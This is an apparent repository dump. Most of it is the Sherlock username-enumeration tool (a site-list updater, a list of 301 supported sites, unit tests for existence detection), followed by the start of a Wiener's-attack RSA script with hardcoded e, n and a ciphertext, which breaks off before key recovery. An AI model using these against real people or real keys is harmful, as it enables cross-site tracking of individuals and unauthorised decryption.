[{social_network}]({url_main})\n') 61 | sys.stdout.write("\r{0}".format(f"Updated {index} out of {data_length} entries")) 62 | sys.stdout.flush() 63 | index = index + 1 64 | 65 | if args.rank: 66 | site_file.write(f'\nAlexa.com rank data fetched at ({datetime.utcnow()} UTC)\n') 67 | 68 | sorted_json_data = json.dumps(data, indent=2, sort_keys=True) 69 | 70 | with open("data.json", "w") as data_file: 71 | data_file.write(sorted_json_data) 72 | 73 | print("\nFinished updating supported site listing!") 74 | -------------------------------------------------------------------------------- /sherlock/sites.md: -------------------------------------------------------------------------------- 1 | ## List Of Supported Sites (301 Sites In Total!) 2 | 1. [2Dimensions](https://2Dimensions.com/) 3 | 2. [3dnews](http://forum.3dnews.ru/) 4 | 3. [4pda](https://4pda.ru/) 5 | 4. [500px](https://500px.com/) 6 | 5. [7Cups](https://www.7cups.com/) 7 | 6. [9GAG](https://9gag.com/) 8 | 7. [About.me](https://about.me/) 9 | 8. [Academia.edu](https://www.academia.edu/) 10 | 9. [AdobeForums](https://forums.adobe.com/) 11 | 10. [Alik.cz](https://www.alik.cz/) 12 | 11. [AllTrails](https://www.alltrails.com/) 13 | 12. [Anobii](https://www.anobii.com/) 14 | 13. [Aptoide](https://en.aptoide.com/) 15 | 14. [Archive.org](https://archive.org) 16 | 15. [Asciinema](https://asciinema.org) 17 | 16. [Ask Fedora](https://ask.fedoraproject.org/) 18 | 17. [AskFM](https://ask.fm/) 19 | 18. [Audiojungle](https://audiojungle.net/) 20 | 19. [Avizo](https://www.avizo.cz/) 21 | 20. [BLIP.fm](https://blip.fm/) 22 | 21. [Badoo](https://badoo.com/) 23 | 22. [Bandcamp](https://www.bandcamp.com/) 24 | 23. [Bazar.cz](https://www.bazar.cz/) 25 | 24. [Behance](https://www.behance.net/) 26 | 25. [BitBucket](https://bitbucket.org/) 27 | 26. [BitCoinForum](https://bitcoinforum.com) 28 | 27. [Blogger](https://www.blogger.com/) 29 | 28. [BodyBuilding](https://bodyspace.bodybuilding.com/) 30 | 29. 
[Bookcrossing](https://www.bookcrossing.com/) 31 | 30. [BuyMeACoffee](https://www.buymeacoffee.com/) 32 | 31. [BuzzFeed](https://buzzfeed.com/) 33 | 32. [CNET](https://www.cnet.com/) 34 | 33. [Carbonmade](https://carbonmade.com/) 35 | 34. [CashMe](https://cash.me/) 36 | 35. [Cent](https://cent.co/) 37 | 36. [Championat](https://www.championat.com/) 38 | 37. [Chatujme.cz](https://chatujme.cz/) 39 | 38. [Chess](https://www.chess.com/ru/) 40 | 39. [Cloob](https://www.cloob.com/) 41 | 40. [CloudflareCommunity](https://community.cloudflare.com/) 42 | 41. [Clozemaster](https://www.clozemaster.com) 43 | 42. [Codecademy](https://www.codecademy.com/) 44 | 43. [Codechef](https://www.codechef.com/) 45 | 44. [Coderwall](https://coderwall.com/) 46 | 45. [Codewars](https://www.codewars.com) 47 | 46. [ColourLovers](https://www.colourlovers.com/) 48 | 47. [Contently](https://contently.com/) 49 | 48. [Coroflot](https://coroflot.com/) 50 | 49. [Cracked](https://www.cracked.com/) 51 | 50. [CreativeMarket](https://creativemarket.com/) 52 | 51. [Crevado](https://crevado.com/) 53 | 52. [Crunchyroll](https://www.crunchyroll.com/) 54 | 53. [DEV Community](https://dev.to/) 55 | 54. [DailyMotion](https://www.dailymotion.com/) 56 | 55. [Designspiration](https://www.designspiration.net/) 57 | 56. [DeviantART](https://deviantart.com) 58 | 57. [Discogs](https://www.discogs.com/) 59 | 58. [Discuss.Elastic.co](https://discuss.elastic.co/) 60 | 59. [Disqus](https://disqus.com/) 61 | 60. [Docker Hub](https://hub.docker.com/) 62 | 61. [Dribbble](https://dribbble.com/) 63 | 62. [Duolingo](https://duolingo.com/) 64 | 63. [Ebay](https://www.ebay.com/) 65 | 64. [Ello](https://ello.co/) 66 | 65. [Etsy](https://www.etsy.com/) 67 | 66. [EyeEm](https://www.eyeem.com/) 68 | 67. [F3.cool](https://f3.cool/) 69 | 68. [Facebook](https://www.facebook.com/) 70 | 69. [Facenama](https://facenama.com/) 71 | 70. [Fandom](https://www.fandom.com/) 72 | 71. [Filmogs](https://www.filmo.gs/) 73 | 72. 
[Fiverr](https://www.fiverr.com/) 74 | 73. [Flickr](https://www.flickr.com/) 75 | 74. [Flightradar24](https://www.flightradar24.com/) 76 | 75. [Flipboard](https://flipboard.com/) 77 | 76. [Football](https://www.rusfootball.info/) 78 | 77. [FortniteTracker](https://fortnitetracker.com/challenges) 79 | 78. [Freesound](https://freesound.org/) 80 | 79. [GDProfiles](https://gdprofiles.com/) 81 | 80. [GPSies](https://www.gpsies.com/) 82 | 81. [Gamespot](https://www.gamespot.com/) 83 | 82. [Giphy](https://giphy.com/) 84 | 83. [GitHub](https://www.github.com/) 85 | 84. [GitLab](https://gitlab.com/) 86 | 85. [Gitee](https://gitee.com/) 87 | 86. [GoodReads](https://www.goodreads.com/) 88 | 87. [Gravatar](http://en.gravatar.com/) 89 | 88. [Gumroad](https://www.gumroad.com/) 90 | 89. [GunsAndAmmo](https://gunsandammo.com/) 91 | 90. [GuruShots](https://gurushots.com/) 92 | 91. [HackTheBox](https://forum.hackthebox.eu/) 93 | 92. [HackerNews](https://news.ycombinator.com/) 94 | 93. [HackerOne](https://hackerone.com/) 95 | 94. [HackerRank](https://hackerrank.com/) 96 | 95. [House-Mixes.com](https://www.house-mixes.com/) 97 | 96. [Houzz](https://houzz.com/) 98 | 97. [HubPages](https://hubpages.com/) 99 | 98. [Hubski](https://hubski.com/) 100 | 99. [IFTTT](https://www.ifttt.com/) 101 | 100. [ImageShack](https://imageshack.us/) 102 | 101. [ImgUp.cz](https://imgup.cz/) 103 | 102. [Instagram](https://www.instagram.com/) 104 | 103. [Instructables](https://www.instructables.com/) 105 | 104. [Investing.com](https://www.investing.com/) 106 | 105. [Issuu](https://issuu.com/) 107 | 106. [Itch.io](https://itch.io/) 108 | 107. [Jimdo](https://jimdosite.com/) 109 | 108. [Kaggle](https://www.kaggle.com/) 110 | 109. [KanoWorld](https://world.kano.me/) 111 | 110. [Keybase](https://keybase.io/) 112 | 111. [Kik](http://kik.me/) 113 | 112. [Kongregate](https://www.kongregate.com/) 114 | 113. [LOR](https://linux.org.ru/) 115 | 114. [Launchpad](https://launchpad.net/) 116 | 115. 
[LeetCode](https://leetcode.com/) 117 | 116. [Letterboxd](https://letterboxd.com/) 118 | 117. [Lichess](https://lichess.org) 119 | 118. [LiveJournal](https://www.livejournal.com/) 120 | 119. [LiveLeak](https://www.liveleak.com/) 121 | 120. [Lobsters](https://lobste.rs/) 122 | 121. [Medium](https://medium.com/) 123 | 122. [MeetMe](https://www.meetme.com/) 124 | 123. [Memrise](https://www.memrise.com/) 125 | 124. [MixCloud](https://www.mixcloud.com/) 126 | 125. [MyAnimeList](https://myanimelist.net/) 127 | 126. [Myspace](https://myspace.com/) 128 | 127. [NICommunityForum](https://www.native-instruments.com/forum/) 129 | 128. [NPM](https://www.npmjs.com/) 130 | 129. [NPM-Package](https://www.npmjs.com/) 131 | 130. [NameMC (Minecraft.net skins)](https://namemc.com/) 132 | 131. [NationStates Nation](https://nationstates.net) 133 | 132. [NationStates Region](https://nationstates.net) 134 | 133. [Newgrounds](https://newgrounds.com) 135 | 134. [OK](https://ok.ru/) 136 | 135. [OpenCollective](https://opencollective.com/) 137 | 136. [OpenStreetMap](https://www.openstreetmap.org/) 138 | 137. [Oracle Community](https://community.oracle.com) 139 | 138. [Otzovik](https://otzovik.com/) 140 | 139. [OurDJTalk](https://ourdjtalk.com/) 141 | 140. [PCPartPicker](https://pcpartpicker.com) 142 | 141. [PSNProfiles.com](https://psnprofiles.com/) 143 | 142. [Packagist](https://packagist.org/) 144 | 143. [Pastebin](https://pastebin.com/) 145 | 144. [Patreon](https://www.patreon.com/) 146 | 145. [Periscope](https://www.periscope.tv/) 147 | 146. [Photobucket](https://photobucket.com/) 148 | 147. [Pinkbike](https://www.pinkbike.com/) 149 | 148. [Pinterest](https://www.pinterest.com/) 150 | 149. [PlayStore](https://play.google.com/store) 151 | 150. [Pling](https://www.pling.com/) 152 | 151. [Plug.DJ](https://plug.dj/) 153 | 152. [Pokemon Showdown](https://pokemonshowdown.com) 154 | 153. [PokerStrategy](http://www.pokerstrategy.net) 155 | 154. [Polygon](https://www.polygon.com/) 156 | 155. 
[ProductHunt](https://www.producthunt.com/) 157 | 156. [PromoDJ](http://promodj.com/) 158 | 157. [Quora](https://www.quora.com/) 159 | 158. [Rajce.net](https://www.rajce.idnes.cz/) 160 | 159. [Rate Your Music](https://rateyourmusic.com/) 161 | 160. [Redbubble](https://www.redbubble.com/) 162 | 161. [Reddit](https://www.reddit.com/) 163 | 162. [Redsun.tf](https://redsun.tf/) 164 | 163. [Repl.it](https://repl.it/) 165 | 164. [ResearchGate](https://www.researchgate.net/) 166 | 165. [ReverbNation](https://www.reverbnation.com/) 167 | 166. [Roblox](https://www.roblox.com/) 168 | 167. [RubyGems](https://rubygems.org/) 169 | 168. [Sbazar.cz](https://www.sbazar.cz/) 170 | 169. [Scratch](https://scratch.mit.edu/) 171 | 170. [Scribd](https://www.scribd.com/) 172 | 171. [ShitpostBot5000](https://www.shitpostbot.com/) 173 | 172. [Signal](https://community.signalusers.org) 174 | 173. [Slack](https://slack.com) 175 | 174. [SlideShare](https://slideshare.net/) 176 | 175. [Smashcast](https://www.smashcast.tv/) 177 | 176. [Smule](https://www.smule.com/) 178 | 177. [SoundCloud](https://soundcloud.com/) 179 | 178. [SourceForge](https://sourceforge.net/) 180 | 179. [Speedrun.com](https://speedrun.com/) 181 | 180. [Splits.io](https://splits.io) 182 | 181. [Sporcle](https://www.sporcle.com/) 183 | 182. [SportsRU](https://www.sports.ru/) 184 | 183. [SportsTracker](https://www.sports-tracker.com/) 185 | 184. [Spotify](https://open.spotify.com/) 186 | 185. [Star Citizen](https://robertsspaceindustries.com/) 187 | 186. [Steam](https://steamcommunity.com/) 188 | 187. [SteamGroup](https://steamcommunity.com/) 189 | 188. [SublimeForum](https://forum.sublimetext.com/) 190 | 189. [T-MobileSupport](https://support.t-mobile.com) 191 | 190. [TamTam](https://tamtam.chat/) 192 | 191. [Taringa](https://taringa.net/) 193 | 192. [Telegram](https://t.me/) 194 | 193. [Tellonym.me](https://tellonym.me/) 195 | 194. [TikTok](https://www.tiktok.com/) 196 | 195. [Tinder](https://tinder.com/) 197 | 196. 
[TrackmaniaLadder](http://en.tm-ladder.com/index.php) 198 | 197. [TradingView](https://www.tradingview.com/) 199 | 198. [Trakt](https://www.trakt.tv/) 200 | 199. [TrashboxRU](https://trashbox.ru/) 201 | 200. [Trello](https://trello.com/) 202 | 201. [Trip](https://www.trip.skyscanner.com/) 203 | 202. [TripAdvisor](https://tripadvisor.com/) 204 | 203. [Twitch](https://www.twitch.tv/) 205 | 204. [Twitter](https://www.twitter.com/) 206 | 205. [Typeracer](https://typeracer.com) 207 | 206. [Ultimate-Guitar](https://ultimate-guitar.com/) 208 | 207. [Unsplash](https://unsplash.com/) 209 | 208. [VK](https://vk.com/) 210 | 209. [VSCO](https://vsco.co/) 211 | 210. [Velomania](https://forum.velomania.ru/) 212 | 211. [Venmo](https://venmo.com/) 213 | 212. [Viadeo](http://fr.viadeo.com/en/) 214 | 213. [Vimeo](https://vimeo.com/) 215 | 214. [Virgool](https://virgool.io/) 216 | 215. [VirusTotal](https://www.virustotal.com/) 217 | 216. [Wattpad](https://www.wattpad.com/) 218 | 217. [We Heart It](https://weheartit.com/) 219 | 218. [WebNode](https://www.webnode.cz/) 220 | 219. [Whonix Forum](https://forums.whonix.org/) 221 | 220. [Wikidot](http://www.wikidot.com/) 222 | 221. [Wikipedia](https://www.wikipedia.org/) 223 | 222. [Wix](https://wix.com/) 224 | 223. [WordPress](https://wordpress.com) 225 | 224. [WordPressOrg](https://wordpress.org/) 226 | 225. [YandexCollection](https://yandex.ru/collections/) 227 | 226. [YouNow](https://www.younow.com/) 228 | 227. [YouPic](https://youpic.com/) 229 | 228. [YouTube](https://www.youtube.com/) 230 | 229. [Zhihu](https://www.zhihu.com/) 231 | 230. [Zomato](https://www.zomato.com/) 232 | 231. [akniga](https://akniga.org/profile/blue/) 233 | 232. [allmylinks](https://allmylinks.com/) 234 | 233. [authorSTREAM](http://www.authorstream.com/) 235 | 234. [babyRU](https://www.baby.ru/) 236 | 235. [babyblogRU](https://www.babyblog.ru/) 237 | 236. [boingboing.net](https://boingboing.net/) 238 | 237. [chaos.social](https://chaos.social/) 239 | 238. 
[couchsurfing](https://www.couchsurfing.com/) 240 | 239. [d3RU](https://d3.ru/) 241 | 240. [dailykos](https://www.dailykos.com) 242 | 241. [datingRU](http://dating.ru) 243 | 242. [devRant](https://devrant.com/) 244 | 243. [tracr.co](https://tracr.co/) 245 | 244. [drive2](https://www.drive2.ru/) 246 | 245. [eGPU](https://egpu.io/) 247 | 246. [easyen](https://easyen.ru/) 248 | 247. [eintracht](https://eintracht.de) 249 | 248. [elwoRU](https://elwo.ru/) 250 | 249. [fixya](https://www.fixya.com) 251 | 250. [fl](https://www.fl.ru/) 252 | 251. [forum_guns](https://forum.guns.ru/) 253 | 252. [forumhouseRU](https://www.forumhouse.ru/) 254 | 253. [geocaching](https://www.geocaching.com/) 255 | 254. [gfycat](https://gfycat.com/) 256 | 255. [gpodder.net](https://gpodder.net/) 257 | 256. [habr](https://habr.com/) 258 | 257. [hackster](https://www.hackster.io) 259 | 258. [hunting](https://www.hunting.ru/forum/) 260 | 259. [iMGSRC.RU](https://imgsrc.ru/) 261 | 260. [igromania](http://forum.igromania.ru/) 262 | 261. [ingvarr.net.ru](http://ingvarr.net.ru/) 263 | 262. [interpals](https://www.interpals.net/) 264 | 263. [irecommend](https://irecommend.ru/) 265 | 264. [jeuxvideo](http://www.jeuxvideo.com) 266 | 265. [kwork](https://www.kwork.ru/) 267 | 266. [labpentestit](https://lab.pentestit.ru/) 268 | 267. [last.fm](https://last.fm/) 269 | 268. [leasehackr](https://forum.leasehackr.com/) 270 | 269. [livelib](https://www.livelib.ru/) 271 | 270. [mastodon.cloud](https://mastodon.cloud/) 272 | 271. [mastodon.social](https://chaos.social/) 273 | 272. [mastodon.technology](https://mastodon.xyz/) 274 | 273. [mastodon.xyz](https://mastodon.xyz/) 275 | 274. [metacritic](https://www.metacritic.com/) 276 | 275. [mixer.com](https://mixer.com/) 277 | 276. [moikrug](https://moikrug.ru/) 278 | 277. [mstdn.io](https://mstdn.io/) 279 | 278. [nnRU](https://www.nn.ru/) 280 | 279. [notabug.org](https://notabug.org/) 281 | 280. [note](https://note.com/) 282 | 281. 
[opennet](https://www.opennet.ru/) 283 | 282. [opensource](https://opensource.com/) 284 | 283. [osu!](https://osu.ppy.sh/) 285 | 284. [pedsovet](http://pedsovet.su/) 286 | 285. [phpRU](https://php.ru/forum/) 287 | 286. [pikabu](https://pikabu.ru/) 288 | 287. [pr0gramm](https://pr0gramm.com/) 289 | 288. [pvpru](https://pvpru.com/) 290 | 289. [radio_echo_msk](https://echo.msk.ru/) 291 | 290. [radioskot](https://radioskot.ru/) 292 | 291. [satsisRU](https://satsis.info/) 293 | 292. [segmentfault](https://segmentfault.com/) 294 | 293. [social.tchncs.de](https://social.tchncs.de/) 295 | 294. [sparkpeople](https://www.sparkpeople.com) 296 | 295. [spletnik](https://spletnik.ru/) 297 | 296. [svidbook](https://www.svidbook.ru/) 298 | 297. [toster](https://www.toster.ru/) 299 | 298. [travellerspoint](https://www.travellerspoint.com) 300 | 299. [uid](https://uid.me/) 301 | 300. [warriorforum](https://www.warriorforum.com/) 302 | 301. [windy](https://windy.com/) 303 | 304 | Alexa.com rank data fetched at (2020-02-24 03:51:43.731207 UTC) 305 | -------------------------------------------------------------------------------- /sherlock/tests/__init__.py: -------------------------------------------------------------------------------- 1 | """Sherlock Tests 2 | 3 | This package contains various submodules used to run tests. 4 | """ 5 | -------------------------------------------------------------------------------- /sherlock/tests/all.py: -------------------------------------------------------------------------------- 1 | """Sherlock Tests 2 | 3 | This module contains various tests. 4 | """ 5 | from tests.base import SherlockBaseTest 6 | import unittest 7 | 8 | 9 | class SherlockDetectTests(SherlockBaseTest): 10 | def test_detect_true_via_message(self): 11 | """Test Username Does Exist (Via Message). 12 | 13 | This test ensures that the "message" detection mechanism of 14 | ensuring that a Username does exist works properly. 15 | 16 | Keyword Arguments: 17 | self -- This object. 
18 | 19 | Return Value: 20 | N/A. 21 | Will trigger an assert if detection mechanism did not work as expected. 22 | """ 23 | 24 | site = 'Instagram' 25 | site_data = self.site_data_all[site] 26 | 27 | #Ensure that the site's detection method has not changed. 28 | self.assertEqual("message", site_data["errorType"]) 29 | 30 | self.username_check([site_data["username_claimed"]], 31 | [site], 32 | exist_check=True 33 | ) 34 | 35 | return 36 | 37 | def test_detect_false_via_message(self): 38 | """Test Username Does Not Exist (Via Message). 39 | 40 | This test ensures that the "message" detection mechanism of 41 | ensuring that a Username does *not* exist works properly. 42 | 43 | Keyword Arguments: 44 | self -- This object. 45 | 46 | Return Value: 47 | N/A. 48 | Will trigger an assert if detection mechanism did not work as expected. 49 | """ 50 | 51 | site = 'Instagram' 52 | site_data = self.site_data_all[site] 53 | 54 | #Ensure that the site's detection method has not changed. 55 | self.assertEqual("message", site_data["errorType"]) 56 | 57 | self.username_check([site_data["username_unclaimed"]], 58 | [site], 59 | exist_check=False 60 | ) 61 | 62 | return 63 | 64 | def test_detect_true_via_status_code(self): 65 | """Test Username Does Exist (Via Status Code). 66 | 67 | This test ensures that the "status code" detection mechanism of 68 | ensuring that a Username does exist works properly. 69 | 70 | Keyword Arguments: 71 | self -- This object. 72 | 73 | Return Value: 74 | N/A. 75 | Will trigger an assert if detection mechanism did not work as expected. 76 | """ 77 | 78 | site = 'Facebook' 79 | site_data = self.site_data_all[site] 80 | 81 | #Ensure that the site's detection method has not changed. 
82 | self.assertEqual("status_code", site_data["errorType"]) 83 | 84 | self.username_check([site_data["username_claimed"]], 85 | [site], 86 | exist_check=True 87 | ) 88 | 89 | return 90 | 91 | def test_detect_false_via_status_code(self): 92 | """Test Username Does Not Exist (Via Status Code). 93 | 94 | This test ensures that the "status code" detection mechanism of 95 | ensuring that a Username does *not* exist works properly. 96 | 97 | Keyword Arguments: 98 | self -- This object. 99 | 100 | Return Value: 101 | N/A. 102 | Will trigger an assert if detection mechanism did not work as expected. 103 | """ 104 | 105 | site = 'Facebook' 106 | site_data = self.site_data_all[site] 107 | 108 | #Ensure that the site's detection method has not changed. 109 | self.assertEqual("status_code", site_data["errorType"]) 110 | 111 | self.username_check([site_data["username_unclaimed"]], 112 | [site], 113 | exist_check=False 114 | ) 115 | 116 | return 117 | 118 | def test_detect_true_via_response_url(self): 119 | """Test Username Does Exist (Via Response URL). 120 | 121 | This test ensures that the "response URL" detection mechanism of 122 | ensuring that a Username does exist works properly. 123 | 124 | Keyword Arguments: 125 | self -- This object. 126 | 127 | Return Value: 128 | N/A. 129 | Will trigger an assert if detection mechanism did not work as expected. 130 | """ 131 | 132 | site = 'Quora' 133 | site_data = self.site_data_all[site] 134 | 135 | #Ensure that the site's detection method has not changed. 136 | self.assertEqual("response_url", site_data["errorType"]) 137 | 138 | self.username_check([site_data["username_claimed"]], 139 | [site], 140 | exist_check=True 141 | ) 142 | 143 | return 144 | 145 | def test_detect_false_via_response_url(self): 146 | """Test Username Does Not Exist (Via Response URL). 147 | 148 | This test ensures that the "response URL" detection mechanism of 149 | ensuring that a Username does *not* exist works properly. 
150 | 151 | Keyword Arguments: 152 | self -- This object. 153 | 154 | Return Value: 155 | N/A. 156 | Will trigger an assert if detection mechanism did not work as expected. 157 | """ 158 | 159 | site = 'Quora' 160 | site_data = self.site_data_all[site] 161 | 162 | #Ensure that the site's detection method has not changed. 163 | self.assertEqual("response_url", site_data["errorType"]) 164 | 165 | self.username_check([site_data["username_unclaimed"]], 166 | [site], 167 | exist_check=False 168 | ) 169 | 170 | return 171 | 172 | 173 | class SherlockSiteCoverageTests(SherlockBaseTest): 174 | def test_coverage_false_via_response_url(self): 175 | """Test Username Does Not Exist Site Coverage (Via Response URL). 176 | 177 | This test checks all sites with the "response URL" detection mechanism 178 | to ensure that a Username that does not exist is reported that way. 179 | 180 | Keyword Arguments: 181 | self -- This object. 182 | 183 | Return Value: 184 | N/A. 185 | Will trigger an assert if detection mechanism did not work as expected. 186 | """ 187 | 188 | self.detect_type_check("response_url", exist_check=False) 189 | 190 | return 191 | 192 | def test_coverage_true_via_response_url(self): 193 | """Test Username Does Exist Site Coverage (Via Response URL). 194 | 195 | This test checks all sites with the "response URL" detection mechanism 196 | to ensure that a Username that does exist is reported that way. 197 | 198 | Keyword Arguments: 199 | self -- This object. 200 | 201 | Return Value: 202 | N/A. 203 | Will trigger an assert if detection mechanism did not work as expected. 204 | """ 205 | 206 | self.detect_type_check("response_url", exist_check=True) 207 | 208 | return 209 | 210 | def test_coverage_false_via_status(self): 211 | """Test Username Does Not Exist Site Coverage (Via HTTP Status). 212 | 213 | This test checks all sites with the "HTTP Status" detection mechanism 214 | to ensure that a Username that does not exist is reported that way. 
215 | 216 | Keyword Arguments: 217 | self -- This object. 218 | 219 | Return Value: 220 | N/A. 221 | Will trigger an assert if detection mechanism did not work as expected. 222 | """ 223 | 224 | self.detect_type_check("status_code", exist_check=False) 225 | 226 | return 227 | 228 | def test_coverage_true_via_status(self): 229 | """Test Username Does Exist Site Coverage (Via HTTP Status). 230 | 231 | This test checks all sites with the "HTTP Status" detection mechanism 232 | to ensure that a Username that does exist is reported that way. 233 | 234 | Keyword Arguments: 235 | self -- This object. 236 | 237 | Return Value: 238 | N/A. 239 | Will trigger an assert if detection mechanism did not work as expected. 240 | """ 241 | 242 | self.detect_type_check("status_code", exist_check=True) 243 | 244 | return 245 | 246 | def test_coverage_false_via_message(self): 247 | """Test Username Does Not Exist Site Coverage (Via Error Message). 248 | 249 | This test checks all sites with the "Error Message" detection mechanism 250 | to ensure that a Username that does not exist is reported that way. 251 | 252 | Keyword Arguments: 253 | self -- This object. 254 | 255 | Return Value: 256 | N/A. 257 | Will trigger an assert if detection mechanism did not work as expected. 258 | """ 259 | 260 | self.detect_type_check("message", exist_check=False) 261 | 262 | return 263 | 264 | def test_coverage_true_via_message(self): 265 | """Test Username Does Exist Site Coverage (Via Error Message). 266 | 267 | This test checks all sites with the "Error Message" detection mechanism 268 | to ensure that a Username that does exist is reported that way. 269 | 270 | Keyword Arguments: 271 | self -- This object. 272 | 273 | Return Value: 274 | N/A. 275 | Will trigger an assert if detection mechanism did not work as expected. 276 | """ 277 | 278 | self.detect_type_check("message", exist_check=True) 279 | 280 | return 281 | 282 | def test_coverage_total(self): 283 | """Test Site Coverage Is Total. 
284 | 285 | This test checks that all sites have test data available. 286 | 287 | Keyword Arguments: 288 | self -- This object. 289 | 290 | Return Value: 291 | N/A. 292 | Will trigger an assert if we do not have total coverage. 293 | """ 294 | 295 | self.coverage_total_check() 296 | 297 | return 298 | -------------------------------------------------------------------------------- /sherlock/tests/base.py: -------------------------------------------------------------------------------- 1 | """Sherlock Base Tests 2 | 3 | This module contains various utilities for running tests. 4 | """ 5 | import json 6 | import os 7 | import os.path 8 | import unittest 9 | import sherlock 10 | import warnings 11 | 12 | 13 | class SherlockBaseTest(unittest.TestCase): 14 | def setUp(self): 15 | """Sherlock Base Test Setup. 16 | 17 | Does common setup tasks for base Sherlock tests. 18 | 19 | Keyword Arguments: 20 | self -- This object. 21 | 22 | Return Value: 23 | N/A. 24 | """ 25 | 26 | #This ignores the ResourceWarning from an unclosed SSLSocket. 27 | #TODO: Figure out how to fix the code so this is not needed. 28 | warnings.simplefilter("ignore", ResourceWarning) 29 | 30 | # Load the data file with all site information. 
31 | data_file_path = os.path.join(os.path.dirname(os.path.realpath(sherlock.__file__)), "data.json") 32 | with open(data_file_path, "r", encoding="utf-8") as raw: 33 | self.site_data_all = json.load(raw) 34 | 35 | # Load excluded sites list, if any 36 | excluded_sites_path = os.path.join(os.path.dirname(os.path.realpath(sherlock.__file__)), "tests/.excluded_sites") 37 | try: 38 | with open(excluded_sites_path, "r", encoding="utf-8") as excluded_sites_file: 39 | self.excluded_sites = excluded_sites_file.read().splitlines() 40 | except FileNotFoundError: 41 | self.excluded_sites = [] 42 | 43 | self.verbose=False 44 | self.tor=False 45 | self.unique_tor=False 46 | self.timeout=None 47 | 48 | return 49 | 50 | def site_data_filter(self, site_list): 51 | """Filter Site Data. 52 | 53 | Keyword Arguments: 54 | self -- This object. 55 | site_list -- List of strings corresponding to sites which 56 | should be filtered. 57 | 58 | Return Value: 59 | Dictionary containing sub-set of site data specified by 'site_list'. 60 | """ 61 | 62 | # Create new dictionary that has filtered site data based on input. 63 | # Note that any site specified which is not understood will generate 64 | # an error. 65 | site_data = {} 66 | for site in site_list: 67 | with self.subTest(f"Checking test vector Site '{site}' " 68 | f"exists in total site data." 69 | ): 70 | site_data[site] = self.site_data_all[site] 71 | 72 | return site_data 73 | 74 | def username_check(self, username_list, site_list, exist_check=True): 75 | """Username Exist Check. 76 | 77 | Keyword Arguments: 78 | self -- This object. 79 | username_list -- List of strings corresponding to usernames 80 | which should exist on *all* of the sites. 81 | site_list -- List of strings corresponding to sites which 82 | should be filtered. 83 | exist_check -- Boolean which indicates if this should be 84 | a check for Username existence, 85 | or non-existence. 86 | 87 | Return Value: 88 | N/A. 
89 | Will trigger an assert if Username does not have the expected 90 | existence state. 91 | """ 92 | 93 | #Filter all site data down to just what is needed for this test. 94 | site_data = self.site_data_filter(site_list) 95 | 96 | if exist_check: 97 | check_type_text = "exists" 98 | exist_result_desired = "yes" 99 | else: 100 | check_type_text = "does not exist" 101 | exist_result_desired = "no" 102 | 103 | for username in username_list: 104 | results = sherlock.sherlock(username, 105 | site_data, 106 | verbose=self.verbose, 107 | tor=self.tor, 108 | unique_tor=self.unique_tor, 109 | timeout=self.timeout 110 | ) 111 | for site, result in results.items(): 112 | with self.subTest(f"Checking Username '{username}' " 113 | f"{check_type_text} on Site '{site}'" 114 | ): 115 | self.assertEqual(result['exists'], exist_result_desired) 116 | 117 | return 118 | 119 | def detect_type_check(self, detect_type, exist_check=True): 120 | """Username Exist Check. 121 | 122 | Keyword Arguments: 123 | self -- This object. 124 | detect_type -- String corresponding to detection algorithm 125 | which is desired to be tested. 126 | Note that only sites which have documented 127 | usernames which exist and do not exist 128 | will be tested. 129 | exist_check -- Boolean which indicates if this should be 130 | a check for Username existence, 131 | or non-existence. 132 | 133 | Return Value: 134 | N/A. 135 | Runs tests on all sites using the indicated detection algorithm 136 | and which also has test vectors specified. 137 | Will trigger an assert if Username does not have the expected 138 | existence state. 139 | """ 140 | 141 | #Dictionary of sites that should be tested for having a username. 142 | #This will allow us to test sites with a common username in parallel. 
143 | sites_by_username = {} 144 | 145 | for site, site_data in self.site_data_all.items(): 146 | if ( 147 | (site in self.excluded_sites) or 148 | (site_data["errorType"] != detect_type) or 149 | (site_data.get("username_claimed") is None) or 150 | (site_data.get("username_unclaimed") is None) 151 | ): 152 | # This is either not a site we are interested in, or the 153 | # site does not contain the required information to do 154 | # the tests. 155 | pass 156 | else: 157 | # We should run a test on this site. 158 | 159 | # Figure out which type of user 160 | if exist_check: 161 | username = site_data.get("username_claimed") 162 | else: 163 | username = site_data.get("username_unclaimed") 164 | 165 | # Add this site to the list of sites corresponding to this 166 | # username. 167 | if username in sites_by_username: 168 | sites_by_username[username].append(site) 169 | else: 170 | sites_by_username[username] = [site] 171 | 172 | # Check on the username availability against all of the sites. 173 | for username, site_list in sites_by_username.items(): 174 | self.username_check([username], 175 | site_list, 176 | exist_check=exist_check 177 | ) 178 | 179 | return 180 | 181 | def coverage_total_check(self): 182 | """Total Coverage Check. 183 | 184 | Keyword Arguments: 185 | self -- This object. 186 | 187 | Return Value: 188 | N/A. 189 | Counts up all Sites with full test data available. 190 | Will trigger an assert if any Site does not have test coverage. 191 | """ 192 | 193 | site_no_tests_list = [] 194 | 195 | for site, site_data in self.site_data_all.items(): 196 | if ( 197 | (site_data.get("username_claimed") is None) or 198 | (site_data.get("username_unclaimed") is None) 199 | ): 200 | # Test information not available on this site. 
201 | site_no_tests_list.append(site) 202 | 203 | self.assertEqual("", ", ".join(site_no_tests_list)) 204 | 205 | return 206 | -------------------------------------------------------------------------------- /weiner.py: -------------------------------------------------------------------------------- 1 | from Crypto.PublicKey import RSA 2 | from Crypto.Util.number import * 3 | from sympy import * 4 | import gmpy 5 | 6 | def cf_expansion(n,d): 7 | a = [] 8 | q = n//d 9 | r = n%d 10 | a.append(q) 11 | while r!=0: 12 | n,d = d,r 13 | q = n//d 14 | r = n%d 15 | a.append(q) 16 | return a 17 | 18 | def convergents(e): 19 | n = [] 20 | d = [] 21 | 22 | for i in range(len(e)): 23 | if i == 0: 24 | ni = e[i] 25 | di = 1 26 | elif i == 1: 27 | ni = e[i]*e[i-1] + 1 28 | di = e[i] 29 | else: 30 | ni = e[i]*n[i-1] + n[i-2] 31 | di = e[i]*d[i-1] + d[i-2] 32 | 33 | n.append(ni) 34 | d.append(di) 35 | yield (ni, di) 36 | 37 | 38 | e = 10313126904907659154044035721366030299232309115307337238069263116199564176949082532958372172524781222401197622749859873567807461466595706294618003558061807305009089579192976992088381679811566030775373564473171308640498756926134368136999882295511187054033765297409191882443609170411704473261992833838123818561 39 | n = 109687016872270895485002266970328712710286894269700902397167363980261414713520289185733988489249689544386122785160267207726938916283070886632648506845942355973707843524843601791935989196521515362641012890949012806874239146986434010907679833739235439641970444255192335936390330185114634466512110682757108170303 40 | c = 95417048455606507206344555772522388669483613888347553614999898346097063082564960534143412714175496839814163484993167584876285328542038828829471182631204991424293520967432055502995782228891541107492929962249088449543437905078172770522604827502428360779940479314653358332616588023267286852819042394155188966503 41 | 42 | 43 | 44 